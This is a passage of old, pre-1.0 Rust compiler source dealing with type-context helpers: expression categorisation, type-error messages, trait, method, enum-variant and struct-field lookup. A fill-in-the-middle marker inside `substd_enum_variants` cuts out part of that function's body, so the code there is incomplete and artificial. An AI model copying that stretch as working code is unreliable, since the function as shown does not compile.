&ctxt, span: Span, r: Region, ty: ty::t) -> ty::t { match get(ty).sty { ty_closure(ref fty) => { ty::mk_closure(cx, ClosureTy { sigil: BorrowedSigil, region: r, ..(**fty).clone() }) } ref s => { cx.sess.span_bug( span, format!("borrow-fn associated with bad sty: {:?}", s)); } } } fn borrow_obj(cx: &ctxt, span: Span, r: Region, m: ast::Mutability, ty: ty::t) -> ty::t { match get(ty).sty { ty_trait(~ty::TyTrait {def_id, ref substs, bounds, .. 
            }) => {
                ty::mk_trait(cx, def_id, substs.clone(),
                             RegionTraitStore(r), m, bounds)
            }
            ref s => {
                cx.sess.span_bug(
                    span,
                    format!("borrow-trait-obj associated with bad sty: {:?}",
                            s));
            }
        }
    }
}

pub fn trait_adjustment_to_ty(cx: &ctxt,
                              sigil: &ast::Sigil,
                              region: &Option<Region>,
                              def_id: ast::DefId,
                              substs: &substs,
                              m: ast::Mutability,
                              bounds: BuiltinBounds)
                              -> t {
    let trait_store = match *sigil {
        BorrowedSigil => RegionTraitStore(region.expect("expected valid region")),
        OwnedSigil => UniqTraitStore,
        ManagedSigil => unreachable!()
    };

    mk_trait(cx, def_id, substs.clone(), trait_store, m, bounds)
}

impl AutoRef {
    pub fn map_region(&self, f: |Region| -> Region) -> AutoRef {
        match *self {
            ty::AutoPtr(r, m) => ty::AutoPtr(f(r), m),
            ty::AutoBorrowVec(r, m) => ty::AutoBorrowVec(f(r), m),
            ty::AutoBorrowVecRef(r, m) => ty::AutoBorrowVecRef(f(r), m),
            ty::AutoBorrowFn(r) => ty::AutoBorrowFn(f(r)),
            ty::AutoUnsafe(m) => ty::AutoUnsafe(m),
            ty::AutoBorrowObj(r, m) => ty::AutoBorrowObj(f(r), m),
        }
    }
}

pub struct ParamsTy {
    params: Vec<t>,
    ty: t
}

pub fn expr_ty_params_and_ty(cx: &ctxt,
                             expr: &ast::Expr)
                          -> ParamsTy {
    ParamsTy {
        params: node_id_to_type_params(cx, expr.id),
        ty: node_id_to_type(cx, expr.id)
    }
}

pub fn expr_has_ty_params(cx: &ctxt, expr: &ast::Expr) -> bool {
    return node_id_has_type_params(cx, expr.id);
}

pub fn method_call_type_param_defs(tcx: &ctxt, origin: typeck::MethodOrigin)
                                   -> Rc<Vec<TypeParameterDef>> {
    match origin {
        typeck::MethodStatic(did) => {
            // n.b.: When we encode impl methods, the bounds
            // that we encode include both the impl bounds
            // and then the method bounds themselves...
            ty::lookup_item_type(tcx, did).generics.type_param_defs
        }
        typeck::MethodParam(typeck::MethodParam {
            trait_id: trt_id,
            method_num: n_mth, ..}) |
        typeck::MethodObject(typeck::MethodObject {
            trait_id: trt_id,
            method_num: n_mth, ..}) => {
            // ...trait method bounds, in contrast, include only the
            // method bounds, so we must prepend the tps from the
            // trait itself. This ought to be harmonized.
            let trait_type_param_defs =
                lookup_trait_def(tcx, trt_id).generics.type_param_defs();
            Rc::new(Vec::from_slice(trait_type_param_defs).append(
                        ty::trait_method(tcx,
                                         trt_id,
                                         n_mth).generics.type_param_defs()))
        }
    }
}

pub fn resolve_expr(tcx: &ctxt, expr: &ast::Expr) -> ast::Def {
    match tcx.def_map.borrow().find(&expr.id) {
        Some(&def) => def,
        None => {
            tcx.sess.span_bug(expr.span, format!(
                "no def-map entry for expr {:?}", expr.id));
        }
    }
}

pub fn expr_is_lval(tcx: &ctxt,
                    method_map: MethodMap,
                    e: &ast::Expr) -> bool {
    match expr_kind(tcx, method_map, e) {
        LvalueExpr => true,
        RvalueDpsExpr | RvalueDatumExpr | RvalueStmtExpr => false
    }
}

/// We categorize expressions into three kinds. The distinction between
/// lvalue/rvalue is fundamental to the language. The distinction between the
/// two kinds of rvalues is an artifact of trans which reflects how we will
/// generate code for that kind of expression. See trans/expr.rs for more
/// information.
pub enum ExprKind {
    LvalueExpr,
    RvalueDpsExpr,
    RvalueDatumExpr,
    RvalueStmtExpr
}

pub fn expr_kind(tcx: &ctxt,
                 method_map: MethodMap,
                 expr: &ast::Expr) -> ExprKind {
    if method_map.borrow().contains_key(&MethodCall::expr(expr.id)) {
        // Overloaded operations are generally calls, and hence they are
        // generated via DPS, but there are two exceptions:
        return match expr.node {
            // `a += b` has a unit result.
            ast::ExprAssignOp(..) => RvalueStmtExpr,

            // the deref method invoked for `*a` always yields an `&T`
            ast::ExprUnary(ast::UnDeref, _) => LvalueExpr,

            // in the general case, result could be any type, use DPS
            _ => RvalueDpsExpr
        };
    }

    match expr.node {
        ast::ExprPath(..) => {
            match resolve_expr(tcx, expr) {
                ast::DefVariant(tid, vid, _) => {
                    let variant_info = enum_variant_with_id(tcx, tid, vid);
                    if variant_info.args.len() > 0u {
                        // N-ary variant.
                        RvalueDatumExpr
                    } else {
                        // Nullary variant.
                        RvalueDpsExpr
                    }
                }

                ast::DefStruct(_) => {
                    match get(expr_ty(tcx, expr)).sty {
                        ty_bare_fn(..) => RvalueDatumExpr,
                        _ => RvalueDpsExpr
                    }
                }

                // Fn pointers are just scalar values.
                ast::DefFn(..) | ast::DefStaticMethod(..) => RvalueDatumExpr,

                // Note: there is actually a good case to be made that
                // DefArg's, particularly those of immediate type, ought to
                // be considered rvalues.
                ast::DefStatic(..) |
                ast::DefBinding(..) |
                ast::DefUpvar(..) |
                ast::DefArg(..) |
                ast::DefLocal(..) => LvalueExpr,

                def => {
                    tcx.sess.span_bug(expr.span, format!(
                        "uncategorized def for expr {:?}: {:?}",
                        expr.id, def));
                }
            }
        }

        ast::ExprUnary(ast::UnDeref, _) |
        ast::ExprField(..) |
        ast::ExprIndex(..) => {
            LvalueExpr
        }

        ast::ExprCall(..) |
        ast::ExprMethodCall(..) |
        ast::ExprStruct(..) |
        ast::ExprTup(..) |
        ast::ExprIf(..) |
        ast::ExprMatch(..) |
        ast::ExprFnBlock(..) |
        ast::ExprProc(..) |
        ast::ExprBlock(..) |
        ast::ExprRepeat(..) |
        ast::ExprVstore(_, ast::ExprVstoreSlice) |
        ast::ExprVstore(_, ast::ExprVstoreMutSlice) |
        ast::ExprVec(..) => {
            RvalueDpsExpr
        }

        ast::ExprLit(lit) if lit_is_str(lit) => {
            RvalueDpsExpr
        }

        ast::ExprCast(..) => {
            match tcx.node_types.borrow().find(&(expr.id as uint)) {
                Some(&t) => {
                    if type_is_trait(t) {
                        RvalueDpsExpr
                    } else {
                        RvalueDatumExpr
                    }
                }
                None => {
                    // Technically, it should not happen that the expr is not
                    // present within the table. However, it DOES happen
                    // during type check, because the final types from the
                    // expressions are not yet recorded in the tcx. At that
                    // time, though, we are only interested in knowing lvalue
                    // vs rvalue. It would be better to base this decision on
                    // the AST type in cast node---but (at the time of this
                    // writing) it's not easy to distinguish casts to traits
                    // from other casts based on the AST. This should be
                    // easier in the future, when casts to traits would look
                    // like @Foo, ~Foo, or &Foo.
                    RvalueDatumExpr
                }
            }
        }

        ast::ExprBreak(..) |
        ast::ExprAgain(..) |
        ast::ExprRet(..) |
        ast::ExprWhile(..) |
        ast::ExprLoop(..) |
        ast::ExprAssign(..) |
        ast::ExprInlineAsm(..) |
        ast::ExprAssignOp(..) => {
            RvalueStmtExpr
        }

        ast::ExprForLoop(..) => fail!("non-desugared expr_for_loop"),

        ast::ExprLit(_) | // Note: LitStr is carved out above
        ast::ExprUnary(..) |
        ast::ExprAddrOf(..) |
        ast::ExprBinary(..) |
        ast::ExprVstore(_, ast::ExprVstoreUniq) => {
            RvalueDatumExpr
        }

        ast::ExprBox(place, _) => {
            // Special case `~T` for now:
            let definition = match tcx.def_map.borrow().find(&place.id) {
                Some(&def) => def,
                None => fail!("no def for place"),
            };
            let def_id = ast_util::def_id_of_def(definition);
            match tcx.lang_items.items.get(ExchangeHeapLangItem as uint) {
                &Some(item_def_id) if def_id == item_def_id => {
                    RvalueDatumExpr
                }
                &Some(_) | &None => RvalueDpsExpr,
            }
        }

        ast::ExprParen(e) => expr_kind(tcx, method_map, e),

        ast::ExprMac(..) => {
            tcx.sess.span_bug(
                expr.span,
                "macro expression remains after expansion");
        }
    }
}

pub fn stmt_node_id(s: &ast::Stmt) -> ast::NodeId {
    match s.node {
        ast::StmtDecl(_, id) | StmtExpr(_, id) | StmtSemi(_, id) => {
            return id;
        }
        ast::StmtMac(..)
=> fail!("unexpanded macro in trans") } } pub fn field_idx(name: ast::Name, fields: &[field]) -> Option<uint> { let mut i = 0u; for f in fields.iter() { if f.ident.name == name { return Some(i); } i += 1u; } return None; } pub fn field_idx_strict(tcx: &ctxt, name: ast::Name, fields: &[field]) -> uint { let mut i = 0u; for f in fields.iter() { if f.ident.name == name { return i; } i += 1u; } tcx.sess.bug(format!( "no field named `{}` found in the list of fields `{:?}`", token::get_name(name), fields.iter().map(|f| token::get_ident(f.ident).get().to_str()).collect::<Vec<~str>>())); } pub fn method_idx(id: ast::Ident, meths: &[@Method]) -> Option<uint> { meths.iter().position(|m| m.ident == id) } /// Returns a vector containing the indices of all type parameters that appear /// in `ty`. The vector may contain duplicates. Probably should be converted /// to a bitset or some other representation. pub fn param_tys_in_type(ty: t) -> Vec<param_ty> { let mut rslt = Vec::new(); walk_ty(ty, |ty| { match get(ty).sty { ty_param(p) => { rslt.push(p); } _ => () } }); rslt } pub fn ty_sort_str(cx: &ctxt, t: t) -> ~str { match get(t).sty { ty_nil | ty_bot | ty_bool | ty_char | ty_int(_) | ty_uint(_) | ty_float(_) | ty_str(_) => { ::util::ppaux::ty_to_str(cx, t) } ty_enum(id, _) => format!("enum {}", item_path_str(cx, id)), ty_box(_) => ~"@-ptr", ty_uniq(_) => ~"~-ptr", ty_vec(_, _) => ~"vector", ty_unboxed_vec(_) => ~"unboxed vector", ty_ptr(_) => ~"*-ptr", ty_rptr(_, _) => ~"&-ptr", ty_bare_fn(_) => ~"extern fn", ty_closure(_) => ~"fn", ty_trait(ref inner) => format!("trait {}", item_path_str(cx, inner.def_id)), ty_struct(id, _) => format!("struct {}", item_path_str(cx, id)), ty_tup(_) => ~"tuple", ty_infer(TyVar(_)) => ~"inferred type", ty_infer(IntVar(_)) => ~"integral variable", ty_infer(FloatVar(_)) => ~"floating-point variable", ty_param(_) => ~"type parameter", ty_self(_) => ~"self", ty_err => ~"type error" } } pub fn type_err_to_str(cx: &ctxt, err: &type_err) -> ~str { /*! * * Explains the source of a type err in a short, * human readable way. This is meant to be placed in * parentheses after some larger message. You should * also invoke `note_and_explain_type_err()` afterwards * to present additional details, particularly when * it comes to lifetime-related errors. 
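 * For example (illustrative), `terr_sorts` yields text such as
 * "expected vector but found ~-ptr", assembled from `ty_sort_str` above.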
*/ fn terr_vstore_kind_to_str(k: terr_vstore_kind) -> ~str { match k { terr_vec => ~"[]", terr_str => ~"str", terr_fn => ~"fn", terr_trait => ~"trait" } } match *err { terr_mismatch => ~"types differ", terr_purity_mismatch(values) => { format!("expected {} fn but found {} fn", values.expected.to_str(), values.found.to_str()) } terr_abi_mismatch(values) => { format!("expected {} fn but found {} fn", values.expected.to_str(), values.found.to_str()) } terr_onceness_mismatch(values) => { format!("expected {} fn but found {} fn", values.expected.to_str(), values.found.to_str()) } terr_sigil_mismatch(values) => { format!("expected {} closure, found {} closure", values.expected.to_str(), values.found.to_str()) } terr_mutability => ~"values differ in mutability", terr_box_mutability => ~"boxed values differ in mutability", terr_vec_mutability => ~"vectors differ in mutability", terr_ptr_mutability => ~"pointers differ in mutability", terr_ref_mutability => ~"references differ in mutability", terr_ty_param_size(values) => { format!("expected a type with {} type params \ but found one with {} type params", values.expected, values.found) } terr_tuple_size(values) => { format!("expected a tuple with {} elements \ but found one with {} elements", values.expected, values.found) } terr_record_size(values) => { format!("expected a record with {} fields \ but found one with {} fields", values.expected, values.found) } terr_record_mutability => { ~"record elements differ in mutability" } terr_record_fields(values) => { format!("expected a record with field `{}` but found one with field \ `{}`", token::get_ident(values.expected), token::get_ident(values.found)) } terr_arg_count => ~"incorrect number of function parameters", terr_regions_does_not_outlive(..) => { format!("lifetime mismatch") } terr_regions_not_same(..) => { format!("lifetimes are not the same") } terr_regions_no_overlap(..) 
        => {
            format!("lifetimes do not intersect")
        }
        terr_regions_insufficiently_polymorphic(br, _) => {
            format!("expected bound lifetime parameter {}, \
                     but found concrete lifetime",
                    bound_region_ptr_to_str(cx, br))
        }
        terr_regions_overly_polymorphic(br, _) => {
            format!("expected concrete lifetime, \
                     but found bound lifetime parameter {}",
                    bound_region_ptr_to_str(cx, br))
        }
        terr_vstores_differ(k, ref values) => {
            format!("{} storage differs: expected `{}` but found `{}`",
                    terr_vstore_kind_to_str(k),
                    vstore_to_str(cx, (*values).expected),
                    vstore_to_str(cx, (*values).found))
        }
        terr_trait_stores_differ(_, ref values) => {
            format!("trait storage differs: expected `{}` but found `{}`",
                    trait_store_to_str(cx, (*values).expected),
                    trait_store_to_str(cx, (*values).found))
        }
        terr_in_field(err, fname) => {
            format!("in field `{}`, {}", token::get_ident(fname),
                    type_err_to_str(cx, err))
        }
        terr_sorts(values) => {
            format!("expected {} but found {}",
                    ty_sort_str(cx, values.expected),
                    ty_sort_str(cx, values.found))
        }
        terr_traits(values) => {
            format!("expected trait `{}` but found trait `{}`",
                    item_path_str(cx, values.expected),
                    item_path_str(cx, values.found))
        }
        terr_builtin_bounds(values) => {
            if values.expected.is_empty() {
                format!("expected no bounds but found `{}`",
                        values.found.user_string(cx))
            } else if values.found.is_empty() {
                format!("expected bounds `{}` but found no bounds",
                        values.expected.user_string(cx))
            } else {
                format!("expected bounds `{}` but found bounds `{}`",
                        values.expected.user_string(cx),
                        values.found.user_string(cx))
            }
        }
        terr_integer_as_char => {
            format!("expected an integral type but found `char`")
        }
        terr_int_mismatch(ref values) => {
            format!("expected `{}` but found `{}`",
                    values.expected.to_str(),
                    values.found.to_str())
        }
        terr_float_mismatch(ref values) => {
            format!("expected `{}` but found `{}`",
                    values.expected.to_str(),
                    values.found.to_str())
        }
        terr_variadic_mismatch(ref values) => {
            format!("expected {} fn but found {} fn",
                    if values.expected { "variadic" } else { "non-variadic" },
                    if values.found { "variadic" } else { "non-variadic" })
        }
    }
}

pub fn note_and_explain_type_err(cx: &ctxt, err: &type_err) {
    match *err {
        terr_regions_does_not_outlive(subregion, superregion) => {
            note_and_explain_region(cx, "", subregion, "...");
            note_and_explain_region(cx, "...does not necessarily outlive ",
                                    superregion, "");
        }
        terr_regions_not_same(region1, region2) => {
            note_and_explain_region(cx, "", region1, "...");
            note_and_explain_region(cx, "...is not the same lifetime as ",
                                    region2, "");
        }
        terr_regions_no_overlap(region1, region2) => {
            note_and_explain_region(cx, "", region1, "...");
            note_and_explain_region(cx, "...does not overlap ",
                                    region2, "");
        }
        terr_regions_insufficiently_polymorphic(_, conc_region) => {
            note_and_explain_region(cx,
                                    "concrete lifetime that was found is ",
                                    conc_region, "");
        }
        terr_regions_overly_polymorphic(_, conc_region) => {
            note_and_explain_region(cx,
                                    "expected concrete lifetime is ",
                                    conc_region, "");
        }
        _ => {}
    }
}

pub fn def_has_ty_params(def: ast::Def) -> bool {
    match def {
        ast::DefFn(_, _) | ast::DefVariant(_, _, _) | ast::DefStruct(_)
            => true,
        _ => false
    }
}

pub fn provided_source(cx: &ctxt, id: ast::DefId) -> Option<ast::DefId> {
    cx.provided_method_sources.borrow().find(&id).map(|x| *x)
}

pub fn provided_trait_methods(cx: &ctxt, id: ast::DefId) -> Vec<@Method> {
    if is_local(id) {
        {
            match cx.map.find(id.node) {
                Some(ast_map::NodeItem(item)) => {
                    match item.node {
                        ItemTrait(_, _, ref ms) => {
                            let (_, p) =
                                ast_util::split_trait_methods(ms.as_slice());
                            p.iter()
.map(|m| method(cx, ast_util::local_def(m.id))) .collect() } _ => { cx.sess.bug(format!("provided_trait_methods: \ `{:?}` is not a trait", id)) } } } _ => { cx.sess.bug(format!("provided_trait_methods: `{:?}` is not \ a trait", id)) } } } } else { csearch::get_provided_trait_methods(cx, id) } } pub fn trait_supertraits(cx: &ctxt, id: ast::DefId) -> @Vec<@TraitRef> { // Check the cache. match cx.supertraits.borrow().find(&id) { Some(&trait_refs) => { return trait_refs; } None => {} // Continue. } // Not in the cache. It had better be in the metadata, which means it // shouldn't be local. assert!(!is_local(id)); // Get the supertraits out of the metadata and create the // TraitRef for each. let result = @csearch::get_supertraits(cx, id); cx.supertraits.borrow_mut().insert(id, result); return result; } pub fn trait_ref_supertraits(cx: &ctxt, trait_ref: &ty::TraitRef) -> Vec<@TraitRef> { let supertrait_refs = trait_supertraits(cx, trait_ref.def_id); supertrait_refs.iter().map( |supertrait_ref| supertrait_ref.subst(cx, &trait_ref.substs)).collect() } fn lookup_locally_or_in_crate_store<V:Clone>( descr: &str, def_id: ast::DefId, map: &mut DefIdMap<V>, load_external: || -> V) -> V { /*! * Helper for looking things up in the various maps * that are populated during typeck::collect (e.g., * `cx.methods`, `cx.tcache`, etc). All of these share * the pattern that if the id is local, it should have * been loaded into the map by the `typeck::collect` phase. * If the def-id is external, then we have to go consult * the crate loading code (and cache the result for the future). */ match map.find_copy(&def_id) { Some(v) => { return v; } None => { } } if def_id.krate == ast::LOCAL_CRATE { fail!("No def'n found for {:?} in tcx.{}", def_id, descr); } let v = load_external(); map.insert(def_id, v.clone()); v } pub fn trait_method(cx: &ctxt, trait_did: ast::DefId, idx: uint) -> @Method { let method_def_id = *ty::trait_method_def_ids(cx, trait_did).get(idx); ty::method(cx, method_def_id) } pub fn trait_methods(cx: &ctxt, trait_did: ast::DefId) -> @Vec<@Method> { let mut trait_methods = cx.trait_methods_cache.borrow_mut(); match trait_methods.find(&trait_did) { Some(&methods) => methods, None => { let def_ids = ty::trait_method_def_ids(cx, trait_did); let methods = @def_ids.iter().map(|d| ty::method(cx, *d)).collect(); trait_methods.insert(trait_did, methods); methods } } } pub fn method(cx: &ctxt, id: ast::DefId) -> @Method { lookup_locally_or_in_crate_store("methods", id, &mut *cx.methods.borrow_mut(), || { @csearch::get_method(cx, id) }) } pub fn trait_method_def_ids(cx: &ctxt, id: ast::DefId) -> @Vec<DefId> { lookup_locally_or_in_crate_store("trait_method_def_ids", id, &mut *cx.trait_method_def_ids.borrow_mut(), || { @csearch::get_trait_method_def_ids(&cx.sess.cstore, id) }) } pub fn impl_trait_ref(cx: &ctxt, id: ast::DefId) -> Option<@TraitRef> { match cx.impl_trait_cache.borrow().find(&id) { Some(&ret) => { return ret; } None => {} } let ret = if id.krate == ast::LOCAL_CRATE { debug!("(impl_trait_ref) searching for trait impl {:?}", id); match cx.map.find(id.node) { Some(ast_map::NodeItem(item)) => { match item.node { ast::ItemImpl(_, ref opt_trait, _, _) => { match opt_trait { &Some(ref t) => { Some(ty::node_id_to_trait_ref(cx, t.ref_id)) } &None => None } } _ => None } } _ => None } } else { csearch::get_impl_trait(cx, id) }; cx.impl_trait_cache.borrow_mut().insert(id, ret); return ret; } pub fn trait_ref_to_def_id(tcx: &ctxt, tr: &ast::TraitRef) -> ast::DefId { let def = *tcx.def_map.borrow() 
.find(&tr.ref_id) .expect("no def-map entry for trait"); ast_util::def_id_of_def(def) } pub fn try_add_builtin_trait(tcx: &ctxt, trait_def_id: ast::DefId, builtin_bounds: &mut BuiltinBounds) -> bool { //! Checks whether `trait_ref` refers to one of the builtin //! traits, like `Send`, and adds the corresponding //! bound to the set `builtin_bounds` if so. Returns true if `trait_ref` //! is a builtin trait. match tcx.lang_items.to_builtin_kind(trait_def_id) { Some(bound) => { builtin_bounds.add(bound); true } None => false } } pub fn ty_to_def_id(ty: t) -> Option<ast::DefId> { match get(ty).sty { ty_trait(~TyTrait { def_id: id, .. }) | ty_struct(id, _) | ty_enum(id, _) => Some(id), _ => None } } // Enum information #[deriving(Clone)] pub struct VariantInfo { args: Vec<t>, arg_names: Option<Vec<ast::Ident> >, ctor_ty: t, name: ast::Ident, id: ast::DefId, disr_val: Disr, vis: Visibility } impl VariantInfo { /// Creates a new VariantInfo from the corresponding ast representation. /// /// Does not do any caching of the value in the type context. pub fn from_ast_variant(cx: &ctxt, ast_variant: &ast::Variant, discriminant: Disr) -> VariantInfo { let ctor_ty = node_id_to_type(cx, ast_variant.node.id); match ast_variant.node.kind { ast::TupleVariantKind(ref args) => { let arg_tys = if args.len() > 0 { ty_fn_args(ctor_ty).iter().map(|a| *a).collect() } else { Vec::new() }; return VariantInfo { args: arg_tys, arg_names: None, ctor_ty: ctor_ty, name: ast_variant.node.name, id: ast_util::local_def(ast_variant.node.id), disr_val: discriminant, vis: ast_variant.node.vis }; }, ast::StructVariantKind(ref struct_def) => { let fields: &[StructField] = struct_def.fields.as_slice(); assert!(fields.len() > 0); let arg_tys = ty_fn_args(ctor_ty).iter().map(|a| *a).collect(); let arg_names = fields.iter().map(|field| { match field.node.kind { NamedField(ident, _) => ident, UnnamedField(..) => cx.sess.bug( "enum_variants: all fields in struct must have a name") } }).collect(); return VariantInfo { args: arg_tys, arg_names: Some(arg_names), ctor_ty: ctor_ty, name: ast_variant.node.name, id: ast_util::local_def(ast_variant.node.id), disr_val: discriminant, vis: ast_variant.node.vis }; } } } } pub fn substd_enum_variants(cx: &ctxt, id: ast::DefId, substs: &substs) -> Vec<@VariantInfo> {<|fim▁hole|> .map(|aty| subst(cx, substs, *aty)).collect(); let substd_ctor_ty = subst(cx, substs, variant_info.ctor_ty); @VariantInfo { args: substd_args, ctor_ty: substd_ctor_ty, ..(**variant_info).clone() } }).collect() } pub fn item_path_str(cx: &ctxt, id: ast::DefId) -> ~str { with_path(cx, id, |path| ast_map::path_to_str(path)) } pub enum DtorKind { NoDtor, TraitDtor(DefId, bool) } impl DtorKind { pub fn is_not_present(&self) -> bool { match *self { NoDtor => true, _ => false } } pub fn is_present(&self) -> bool { !self.is_not_present() } pub fn has_drop_flag(&self) -> bool { match self { &NoDtor => false, &TraitDtor(_, flag) => flag } } } /* If struct_id names a struct with a dtor, return Some(the dtor's id). Otherwise return none. 
*/ pub fn ty_dtor(cx: &ctxt, struct_id: DefId) -> DtorKind { match cx.destructor_for_type.borrow().find(&struct_id) { Some(&method_def_id) => { let flag = !has_attr(cx, struct_id, "unsafe_no_drop_flag"); TraitDtor(method_def_id, flag) } None => NoDtor, } } pub fn has_dtor(cx: &ctxt, struct_id: DefId) -> bool { ty_dtor(cx, struct_id).is_present() } pub fn with_path<T>(cx: &ctxt, id: ast::DefId, f: |ast_map::PathElems| -> T) -> T { if id.krate == ast::LOCAL_CRATE { cx.map.with_path(id.node, f) } else { f(ast_map::Values(csearch::get_item_path(cx, id).iter()).chain(None)) } } pub fn enum_is_univariant(cx: &ctxt, id: ast::DefId) -> bool { enum_variants(cx, id).len() == 1 } pub fn type_is_empty(cx: &ctxt, t: t) -> bool { match ty::get(t).sty { ty_enum(did, _) => (*enum_variants(cx, did)).is_empty(), _ => false } } pub fn enum_variants(cx: &ctxt, id: ast::DefId) -> @Vec<@VariantInfo> { match cx.enum_var_cache.borrow().find(&id) { Some(&variants) => return variants, _ => { /* fallthrough */ } } let result = if ast::LOCAL_CRATE != id.krate { @csearch::get_enum_variants(cx, id) } else { /* Although both this code and check_enum_variants in typeck/check call eval_const_expr, it should never get called twice for the same expr, since check_enum_variants also updates the enum_var_cache */ { match cx.map.get(id.node) { ast_map::NodeItem(item) => { match item.node { ast::ItemEnum(ref enum_definition, _) => { let mut last_discriminant: Option<Disr> = None; @enum_definition.variants.iter().map(|&variant| { let mut discriminant = match last_discriminant { Some(val) => val + 1, None => INITIAL_DISCRIMINANT_VALUE }; match variant.node.disr_expr { Some(e) => match const_eval::eval_const_expr_partial(cx, e) { Ok(const_eval::const_int(val)) => { discriminant = val as Disr } Ok(const_eval::const_uint(val)) => { discriminant = val as Disr } Ok(_) => { cx.sess .span_err(e.span, "expected signed integer \ constant"); } Err(ref err) => { cx.sess .span_err(e.span, format!("expected \ constant: {}", *err)); } }, None => {} }; let variant_info = @VariantInfo::from_ast_variant(cx, variant, discriminant); last_discriminant = Some(discriminant); variant_info }).collect() } _ => { cx.sess.bug("enum_variants: id not bound to an enum") } } } _ => cx.sess.bug("enum_variants: id not bound to an enum") } } }; cx.enum_var_cache.borrow_mut().insert(id, result); result } // Returns information about the enum variant with the given ID: pub fn enum_variant_with_id(cx: &ctxt, enum_id: ast::DefId, variant_id: ast::DefId) -> @VariantInfo { let variants = enum_variants(cx, enum_id); let mut i = 0; while i < variants.len() { let variant = *variants.get(i); if variant.id == variant_id { return variant } i += 1; } cx.sess.bug("enum_variant_with_id(): no variant exists with that ID"); } // If the given item is in an external crate, looks up its type and adds it to // the type cache. Returns the type parameters and type. pub fn lookup_item_type(cx: &ctxt, did: ast::DefId) -> ty_param_bounds_and_ty { lookup_locally_or_in_crate_store( "tcache", did, &mut *cx.tcache.borrow_mut(), || csearch::get_type(cx, did)) } pub fn lookup_impl_vtables(cx: &ctxt, did: ast::DefId) -> typeck::impl_res { lookup_locally_or_in_crate_store( "impl_vtables", did, &mut *cx.impl_vtables.borrow_mut(), || csearch::get_impl_vtables(cx, did) ) } /// Given the did of a trait, returns its canonical trait ref. 
pub fn lookup_trait_def(cx: &ctxt, did: ast::DefId) -> @ty::TraitDef { let mut trait_defs = cx.trait_defs.borrow_mut(); match trait_defs.find(&did) { Some(&trait_def) => { // The item is in this crate. The caller should have added it to the // type cache already return trait_def; } None => { assert!(did.krate != ast::LOCAL_CRATE); let trait_def = @csearch::get_trait_def(cx, did); trait_defs.insert(did, trait_def); return trait_def; } } } /// Iterate over meta_items of a definition. // (This should really be an iterator, but that would require csearch and // decoder to use iterators instead of higher-order functions.) pub fn each_attr(tcx: &ctxt, did: DefId, f: |@MetaItem| -> bool) -> bool { if is_local(did) { let item = tcx.map.expect_item(did.node); item.attrs.iter().advance(|attr| f(attr.node.value)) } else { let mut cont = true; csearch::get_item_attrs(&tcx.sess.cstore, did, |meta_items| { if cont { cont = meta_items.iter().advance(|ptrptr| f(*ptrptr)); } }); cont } } /// Determine whether an item is annotated with an attribute pub fn has_attr(tcx: &ctxt, did: DefId, attr: &str) -> bool { let mut found = false; each_attr(tcx, did, |item| { if item.name().equiv(&attr) { found = true; false } else { true } }); found } /// Determine whether an item is annotated with `#[packed]` pub fn lookup_packed(tcx: &ctxt, did: DefId) -> bool { has_attr(tcx, did, "packed") } /// Determine whether an item is annotated with `#[simd]` pub fn lookup_simd(tcx: &ctxt, did: DefId) -> bool { has_attr(tcx, did, "simd") } // Obtain the representation annotation for a definition. pub fn lookup_repr_hint(tcx: &ctxt, did: DefId) -> attr::ReprAttr { let mut acc = attr::ReprAny; ty::each_attr(tcx, did, |meta| { acc = attr::find_repr_attr(tcx.sess.diagnostic(), meta, acc); true }); return acc; } // Look up a field ID, whether or not it's local // Takes a list of type substs in case the struct is generic pub fn lookup_field_type(tcx: &ctxt, struct_id: DefId, id: DefId, substs: &substs) -> ty::t { let t = if id.krate == ast::LOCAL_CRATE { node_id_to_type(tcx, id.node) } else { let mut tcache = tcx.tcache.borrow_mut(); match tcache.find(&id) { Some(&ty_param_bounds_and_ty {ty, ..}) => ty, None => { let tpt = csearch::get_field_type(tcx, struct_id, id); tcache.insert(id, tpt.clone()); tpt.ty } } }; subst(tcx, substs, t) } // Look up the list of field names and IDs for a given struct // Fails if the id is not bound to a struct. 
pub fn lookup_struct_fields(cx: &ctxt, did: ast::DefId) -> Vec<field_ty> { if did.krate == ast::LOCAL_CRATE { match cx.map.find(did.node) { Some(ast_map::NodeItem(i)) => { match i.node { ast::ItemStruct(struct_def, _) => { struct_field_tys(struct_def.fields.as_slice()) } _ => cx.sess.bug("struct ID bound to non-struct") } } Some(ast_map::NodeVariant(ref variant)) => { match (*variant).node.kind { ast::StructVariantKind(struct_def) => { struct_field_tys(struct_def.fields.as_slice()) } _ => { cx.sess.bug("struct ID bound to enum variant that \ isn't struct-like") } } } _ => { cx.sess.bug( format!("struct ID not bound to an item: {}", cx.map.node_to_str(did.node))); } } } else { csearch::get_struct_fields(&cx.sess.cstore, did) } } pub fn lookup_struct_field(cx: &ctxt, parent: ast::DefId, field_id: ast::DefId) -> field_ty { let r = lookup_struct_fields(cx, parent); match r.iter().find( |f| f.id.node == field_id.node) { Some(t) => *t, None => cx.sess.bug("struct ID not found in parent's fields") } } fn struct_field_tys(fields: &[StructField]) -> Vec<field_ty> { fields.iter().map(|field| { match field.node.kind { NamedField(ident, visibility) => { field_ty { name: ident.name, id: ast_util::local_def(field.node.id), vis: visibility, } } UnnamedField(visibility) => { field_ty { name: syntax::parse::token::special_idents::unnamed_field.name, id: ast_util::local_def(field.node.id), vis: visibility, } } } }).collect() } // Returns a list of fields corresponding to the struct's items. trans uses // this. Takes a list of substs with which to instantiate field types. pub fn struct_fields(cx: &ctxt, did: ast::DefId, substs: &substs) -> Vec<field> { lookup_struct_fields(cx, did).iter().map(|f| { field { // FIXME #6993: change type of field to Name and get rid of new() ident: ast::Ident::new(f.name), mt: mt { ty: lookup_field_type(cx, did, f.id, substs), mutbl: MutImmutable } } }).collect() } pub fn is_binopable(cx: &ctxt, ty: t, op: ast::BinOp) -> bool { static tycat_other: int = 0; static tycat_bool: int = 1; static tycat_char: int = 2; static tycat_int: int = 3; static tycat_float: int = 4; static tycat_bot: int = 5; static tycat_raw_ptr: int = 6; static opcat_add: int = 0; static opcat_sub: int = 1; static opcat_mult: int = 2; static opcat_shift: int = 3; static opcat_rel: int = 4; static opcat_eq: int = 5; static opcat_bit: int = 6; static opcat_logic: int = 7; fn opcat(op: ast::BinOp) -> int { match op { ast::BiAdd => opcat_add, ast::BiSub => opcat_sub, ast::BiMul => opcat_mult, ast::BiDiv => opcat_mult, ast::BiRem => opcat_mult, ast::BiAnd => opcat_logic, ast::BiOr => opcat_logic, ast::BiBitXor => opcat_bit, ast::BiBitAnd => opcat_bit, ast::BiBitOr => opcat_bit, ast::BiShl => opcat_shift, ast::BiShr => opcat_shift, ast::BiEq => 